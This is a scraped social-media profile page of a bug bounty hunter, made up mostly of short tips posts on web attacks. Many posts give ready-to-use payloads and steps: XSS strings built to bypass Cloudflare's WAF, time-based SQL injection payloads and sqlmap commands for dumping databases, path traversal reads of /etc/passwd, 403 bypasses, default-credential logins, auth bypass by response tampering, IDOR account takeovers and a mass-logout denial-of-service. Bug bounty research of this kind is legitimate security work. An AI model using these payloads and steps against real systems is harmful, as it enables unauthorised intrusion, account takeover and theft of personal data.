🇸🇦 ROOD | GOAT
@0x_rood
Followers
22,913
Following
317
Media
910
Statuses
8,863
Ich heiße rood | born to be bug hunter
Submit report button
Joined November 2018
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Jack Smith
• 376172 Tweets
FEMA
• 353648 Tweets
Lille
• 133820 Tweets
Tigers
• 117920 Tweets
Massa
• 102334 Tweets
Aston Villa
• 85156 Tweets
Maui
• 77317 Tweets
Astros
• 77045 Tweets
Padres
• 71387 Tweets
Royals
• 56225 Tweets
Bank of America
• 52059 Tweets
Kalafina
• 42872 Tweets
Orioles
• 40977 Tweets
#AEWDynamite
• 37106 Tweets
SURPRISE FROM BECKY
• 31798 Tweets
Yankees
• 29383 Tweets
#2BTheQUEEN𖤍
• 29277 Tweets
GOLD RUSH
• 23017 Tweets
三角チョコパイ
• 22124 Tweets
World Series
• 19608 Tweets
ALDS
• 18848 Tweets
岡田監督
• 18694 Tweets
Dimayor
• 18116 Tweets
Brewers
• 17007 Tweets
学園アイドルマスター
• 16972 Tweets
今季限り
• 16091 Tweets
Inter Miami
• 15565 Tweets
SMILEY OF CHARLOTTE03
• 11234 Tweets
藤川球児
• 10766 Tweets
AL Central
• 10490 Tweets
登山の日
• 10148 Tweets
Pinned Tweet
2024 goals?
- Leaderboards will talk instead of me
7
2
93
some ways to bypass 403
1- using space symbols
exmaple:
/admin -> 403
/admin%09 -> 200
/admin%20 -> 200
2- use traversal
Example:
/admin -> 403
/..;/admin -> 200
you can fuzz with traversal sometimes that's end with results
Example: /..;/FUZZ
#bugbountytips
#BugBounty
10
304
966
1- Found login page
2- Intercept POST login request
3- Found parameter called config=
4- But Payload ../../../../../../../../../etc/passwd
5- Successfully read data
and sorry it's path traversal not LFI
#bugbounty
#bugbountytips
13
143
785
Xss is not easy finding
1- Digging for vulnerable endpoint -> 4 Hours
2- Find parameter with param miner
3- Bypass waf -> 30 mins
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
#bugbounty
#bugbountytips
14
140
785
New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#bugbounty
#bugbountytips
10
148
676
many people asked me what's my wordlist i posted 3 times before now this is last tweet about it
general wordlist:
for PHP:
for asp, aspx:
for java applictions:
#bugbountytips
34
273
660
Sql injection is not necessary inject at payload,
You can inject in path
Path: /en/gallery/1
POC: en/gallery/1'XOR(if(now()=sysdate(),sleep(3),0))OR'
#bugbountytips
#bugbounty
12
150
639
1- Found login page in wayback
2- Fuzzing parameter, found parameter called ID
3- Fuzz ID with intruder in burp from 1-10000
4- There’s some ID’s have different content-length
5- When i use url with these ID’s there’s JwT in response than redirect me to account
#bugbountytips
15
99
575
1- Found path for portal in wayback
2- Fuzz it
3- Found login page
4- Another Fuzzing
5- See /manage-users.php with big content length but 302 status
6- Setup match & replace with 302 to 200
7- Bypass authentication and access to admin panel
#bugbountytips
#bugbounty
21
78
563
Website block single or double quotation when you test xss?
Use this payload
</script><svg/onload=alert(0)>
#bugbounty
#bugbountytips
7
112
526
New tip
1- Fuzz target
2- phpmyadmin/setup/index.php --> 403
3- phpMyAdminOLD/setup/index.php --> 200
add phpMyAdminOLD/setup/index.php to your wordlist
#bugbounty
#bugbountytips
12
108
440
1- Login with successful password (save resposne body to use it)
2- logout than copy response that’s for successful login attempt
3- paste json body in wrong attempt response
4- your login successfully = ATO
Note: there’s no cookie or token it’s just normal body
#BugBountytips
30
79
424
Google Dorks for recon
site:*.google.*
site:google.*
site:*.google.com
site:*.google.-*.* -> (good results)
#bugbounty
#bugbountytips
2
96
425
Session Hijacking testing step
1.Login your account
2.Use cookie editor extension in browser
3.Copy all the target cookies
4.Logout your account
5.Paste that cookies in cookie editor extension
6.Refresh page if you are logged in than this is a session hijacking
#bugbountytips
13
104
419
1- found port 8888 open at shodan
2- login panel
3- fuzz and found /api
4- this endpoint have section called password that's have username and password but password encrypted with jwt
5- decrypt password in
6- access to dashboard
#bugbountytips
#bugbounty
14
81
412
Payload: //....//....//....//....//....//....//....//....//....//etc/passwd
Parameter: path=
#bugbountytips
#BugBounty
12
84
405
Some websites to check broken links to find broken link hijacking vulnerabilities
1-
2-
3-
#bugbountytips
#BugBounty
5
117
399
6
124
401
لابات
@eLearnSecurity
متاحة الان بشكل مجاني:
-الشبكات
- الجانب الهجومي والدفاعي في الامن السيراني
- ثغرات CVE
- الكلاود مثل Azure و AWS و Google cloud
اللابات تنفع للي يبي يتدرب عشان ياخذ شهادة من عندهم او يقوي نفسه في الامن السيبراني
رتويت للفائدة
0
84
384
Another sql injection payload:
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
#bugbountytips
#BugBounty
4
104
387
CVE-2021-40875 POC
1- go to :
https://test.
com/files.md5
2- this path show you all files in servers
3- you should found this file /db/sqlsrv/full.sql
4- file have Sensive data & Clinet id & secret
5- report it as High/Critical
#bugbounty
#bugbountytips
6
89
383
اقسم بالله مو مصدق للحين اللي اشوفه انا التاسع على العالم في الثغرات الحرجه ياربي لك الحمد 😭
#BugBounty
51
5
355
I’m not using tools for recon part but in last days i found perfect tool for subdomain enumeration i seen it in
@GodfatherOrwa
live and try it, it’s beautiful tool
#bugbountytips
#BugBounty
9
85
339
Best 5 repositories for bug hunters and penetration tester | Thread
#bugbounty
#bugbountytips
#infosec
29
136
341
Tools i use it in my last live recon
-Naabu
-Arjun
-ffuf
-netlas
-securitytrails
#bugbountytips
#BugBounty
4
74
333
Ok, let’s discuss this
1- fuzz website
2- found this path /jk_status?cmd=dump = dump data
3- search more about this misconfigure
4- found /jk_status?opt=0 = read and write privilege
#BugBounty
#bugbountytips
7
94
330
الكبير وصلللل
كيف وصلت 500 ثغره في اقل من اسبوع + المركز الاول على العالم في الثغرات الحرجة؟ - write up
#bugbounty
24
33
330
1- use ffuf in subdomain
2- /phpldapadmin/ -> 200 ok
3- admin login page
4- try to access admin panel
5- see check box (anonymous login)
6- access with anonymous and read privileges
7- triaged report with high severity 😎
#bugbountytips
#BugBounty
12
93
326
1- here's IDOR leaks PII and parameter called "reset_code"
2- Use victim email in reset password -> It will request OTP from you
3- Back to IDOR request, response was leak reset_code
4- Use it for account takeover
#bugbounty
#bugbountytips
7
44
333
Regex to detect secrets from files
"(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
#infosec
#bugbountytips
4
75
324
Nothing new,
1- full scan ports with naabu
2- port 9000 is open
3- open website
4- access to sonarqube and found secret’s without authentication
5- تصبحو على خير
#BugBounty
#BugBounty
11
53
317
Finding of this day
IDOR in cookie, when I change ID it's take me directly to another user account
Browser Extension for cookie:
#bugbountytips
#bugbounty
7
33
322
TOP 10 SSRF parameters
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?site={target}
#bugbountytips
#BugBounty
0
69
312
one line to get admin login page or panel
cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin"
#bugbountytips
#bugbounty
11
96
305
/api/v1/user/18739 = 403
/api/v2/user/18739 = 200 success
Tip: try to change api version
#bugbountytips
12
45
307
1- found server in shodan with ibm http server 8.5.5
2- search on google about cve’s on it
3- found CVE-2020-4463 XXE and pii leak
4- search exploit on github
5- exploit it
6- the rest servers i’m found it on shodan than test it directly
#bugbountytips
#bugbounty
11
65
306
Intersting finding:
1- Found applicaion for website
2- Logout and found this endpoint at burp api/logout/My_id
3- So here we have idor at logout
4- Make script with chatgpt that's take loop on all Users id
5- Dos attack for to immobilize all users
#bugbountytips
#bugbounty
14
38
305
Bypass email verification
1- Create 2 accounts one you have access on email and another you don't have email on it
2- After verfiy first account, it take you to create password
3- Change email to second account you don't have email access
4- Bypass it.
#bugbountytips
#BugBounty
7
49
303
How I got a $10,000 Penetration Testing Project/Job with Bug Bounty
#BugBounty
#bugbountytips
7
63
297
P1 in 5 minutes
1- subdomain enumeration
2- see interesting sub
3- fuzzing with dirsearch
4- see this path /adminer with login page
5- use default credentials root/root
6- full access to database management portal 😎
#bugbountytips
#bugbountytip
12
82
296
Time sleep sql injection
Payload: 'XOR(if(now()=sysdate(),sleep(33),0))OR'
#bugbounty
#bugbountytips
2
71
301
Warming up for today
Payload: %27%3E%3Ca/+/OnMOuSeOvER%0d=%0dconfirm(document.cookie)%3Ev3dm0s
#BugBounty
#bugbountytips
6
70
291
Crunchbase is important tool in recon proccess and it's paid tool
but i have sample tricky to see all acquisitions for any company
it's google dork
Example: site:*.crunchbase.com "acquired by yahoo"
#bugbountytips
#bugbounty
5
75
293
Nice tip from
@apt511_
if you have mssql and you want to make POC with sqlmap you can add --dbms mssql
Command: sqlmap -u
https://test\com/endpoint/./asp
--dbs --random-agent --time-sec=12 --level=1 --risk=1 --batch --dbms mssql
#bugbountytips
#bugbounty
5
67
292
wait wait, who's back?
first it's webmail page
- fuzzing the site get /adminconsole/ it's admin login page
- /adminconsole/FUZZ
- get /adminconsole/install.htm
- they take me to settings page that's disclose admin pass and sql info
- admin panel pwn
#bugbountytips
#bugbounty
15
56
285
Best tool in:
Parameters discovery: Arjun, Paraminer
Subdomain Enum: securitytrails
Fuzzing: ffuf
Vulnerabilities discovery: nuclei
Xss detection: XSStrike
#bugbountytips
#BugBounty
6
67
278
Big thanks guy's for help
If the second parameter is vulnerable and you want to test it, copy request from burp than put it in sqlmap
command: sqlmap -r request.txt --dbs --random-agent --time-sec=12 --level=1 --risk=1
don't forget to put * at parameter value
#bugbountytips
Guy's i have link with 2 parameters second parameter is vulnerable to sqli but when i choose it with -p it's dosen't work they test just first parameter, what should i do?
6
1
31
11
55
281
Most weird bug, that’s i discovered
Part 1
1- admin login page, put any credentials and change response from 422 to 200 OK
2- it login me to empty panel than after 2 seconds redirect me to login page
#bugbountytips
#bugbounty
4
37
275
Here’s resources that’s help me to exploit this issue
1- this tool help me to dump docker images
2- Read discloses reports at hackerone that’s have same situations, it’s help me to know impact and how to exploit it
3- make poc & report it
#bugbountytips
4
62
270
I will explain my port scanning method
Note: you need shodan plugin and naabu tool
1- visit website, when i see different ports in shodan opening expect 80,443
2- directly i will make full port scanning
3- naabu -host “ip or domain here” -p -
#bugbountytips
#BugBounty
8
60
264
Regex code to detect possible idor parameters
"(?i)(\\?|\\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report|username)((=)|(\\/[0-9]+\\/?))"
#infosec
#bugbountytips
5
67
268
Here’s my last finding (P1)
1- register account
2- intercept request
3- here’s the response in image so in “role” parameter we have ROLE_USER
So i don’t know what i can replace it to privilege my account to admin
4- open source code and look in js files
5- PART 2
#bugbountytips
10
59
262
Improper access control in 5 minutes
1- use ffuf in your target
2- phpMyAdmin/ —> 200 ok
3- phpmyadmin login page
4- add /setup to your link
5- phpmyadmin/setup/
6- when you are lucky you can see setup new servers page
Medium - high bug
#bugbountytips
13
70
265
Recon power
1- collect acquisitions
2- find ASN
3- reverse whois
4- use Shodan
5- subdomain enum + brute force
6- port scanning
7- fuzzing
8- GitHub dorking
Credit: The Bug Hunter’s Methodology v4
@Jhaddix
#bugbountytips
#infosec
4
86
260
1- found port 5000 opened with shodan chrome extension
2- found admin panel
3- username: admin password: admin
4- access to admin portal 👽
#bugbountytips
#BugBounty
11
29
259
1- intercept request
2- login
3- when I forward between requests
4- i found request on path that’s called /users/permissions
5- do intercept > respnse on this request
6- i found (“admin”, “false”, admin_id “0”)
7- i change false to true and 0 to 1
8- privilege ✅
#bugbountytips
3
64
258
1- Go to support fourm
2- There's some inputs like name, email, message
3- Put victim email in input
4- Intercept request
5- You will see 2 hidden parameters in burp for sender mail & cc mail for employees
6- So you can sent mails from offical emails to anyone
#bugbountytips
8
56
253
Idor leads to ATO
1- register on website
2- in account settings we have parameter called ID, it’s have normal id
3- I’m register second account
4- change email and id for second account
5- email changed successfully
6- reset password than takeover
#bugbountytips
#bugbounty
9
43
251
Website have function to create and share jobs
1- create job but don't share it
2- start burp and intercept request
3- change job ID to another ID
4- they will delete job thats linked with ID and share your job
that's called overwrite misconfiguration
#bugbountytips
#bugbounty
2
47
248
in this month I’m get 4 bounties from this bug
Steps to reproduce
1- capture reset password request
2- send it to intruder
3- repeat request 50 times
4- if you get 50 message in your email (reset password) you can report it
#BugBounty
#bugbountytips
18
48
247
CVE-2022-0412 is time based sql injection but you can extract databases with this command
sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3 --batch --flush-session
#bugbounty
#bugbountytips
4
60
245
SenGird key starts with: SG.xxxxxxxxxxxx
Curl command to create POC:
curl -X "GET" "" -H "Authorization: Bearer SENDGRID_TOKEN-HERE" -H "Content-Type: application/json"
_______
You can find it in mobile apps & js files
#bugbountytips
#BugBounty
3
70
245
This bypass still working, impressive
New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#bugbounty
#bugbountytips
10
148
676
2
39
240
Common methods to found API endpoints
1- Swagger UI Documentation
2- Dictionary Attack | Brute force
3- Common wordlist for API Enum :
#bugbountytips
#BugBounty
1
72
234
1- phpmyadmin setup is enabled
2- kanboard is login page on port 45001 with admin:admin credentials
3- صباح الفل
#BugBounty
#bugbountytips
13
30
235
POC tip
1- fuzz target and found /files.md5
2- this file include all files path in server
3- found this path /db/sqlsrv/full.sql
4- this sql file have client ID & secret
#BugBounty
#bugbountytips
12
45
228
Some priv esc issues Part 1
1- Invite User to your org, than accept invite and try to change email -> P4/P3
2- Invite user but before accept invite delete it, than go to email and accept it, if user added successfully report it P3
#bugbounty
#bugbountytips
11
43
228
ثريد : انواع برامج مكافآت اكتشاف االثغرات
ملاحظة : اذا كنت مشغول حطه بالمفضله وارحع له لما تفضى
2
19
212
1- Found endpoint in waybackurls: /core/Filemanager/index.html?type=Images&CKEditor=full_story&CKEditorFuncNum=110&langCode=en
2- upload any file
3- intercept request in body they show default path for uploading files
4- change it to any directory
#bugbountytips
#BugBounty
8
45
222
If you found /actuator/jolokia/ endpoint in your target you can escalate it to LFI
POC:
https://target[.]com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
5
72
221
Using XSS to Create a Keylogger
0
51
220
1- Fuzz target
2- found /upload path
3- directory listing enabled
4- one of files name was 1-247.csv
5- disclosure more than 30k PII
#bugbountytips
#bugbounty
11
32
210
Tips for ssrf
- Just extract endpoints from waymore
- See endpoint called Imageurl=
- Test Burp collab url (You can see response in burp because it's Image content type)
- Than advance exploit
- Found 5 Hosts vulnerable with same endpoint
#bugbountytips
4
35
220
افضل المصادر لتعلم اختبار اختراق تطبيقات الويب (النسخه العربيه)
1-
2-
3-
4-
#bugbounty
#bugbountytips
6
33
209
1- find subdomain with
2- see interesting url
3- full port scan
4- port 3001 | open
5- grafana admin portal
6- use default credentials admin:admin
7- success login to admin portal
#bugbountytips
5
46
211
1- find subdomain: cms. compny. com
2- sign in/up page
3- sign up new account
4- login
5- i have full privileges and leak all PII for customers 🌚
#bugbountytips
#BugBounty
3
27
214
شباب في فكره بسويها بدل البثوث فيها فايده لي ولكم
اني اسجل bug hunting ولاكن مو لايف مقطع كذا مدته ساعتين وبرفعه على منصه غير اليوتيوب عشان لا ينحذف منها يضل محفوظ للابد ومنها انا ما اتوتر وانا افحص واخذ راحتي والفيديو بيكون بدون صوت لان صعبه اشرح طول الساعتين وانا افحص
رايكم؟
33
3
200
1- visit website
2- fuzz with default list
3- found /admin.tar.gz
4- extract files and found sensitive data
Easy find, but not dup
#BugBounty
#bugbountytips
12
40
203
Happy to announce this, i'm most impactful hacker at Critical Reputation on
@Hacker0x01
in 2024 Until now
#BugBounty
17
3
204
Nothing unique here
1- found acquisition from google
2- found main domain for acquisition
3- waybackurl
4- endpoint leads me to signup new admin account
5- add/edit/delete privileges
#bugbountytips
#BugBounty
6
29
198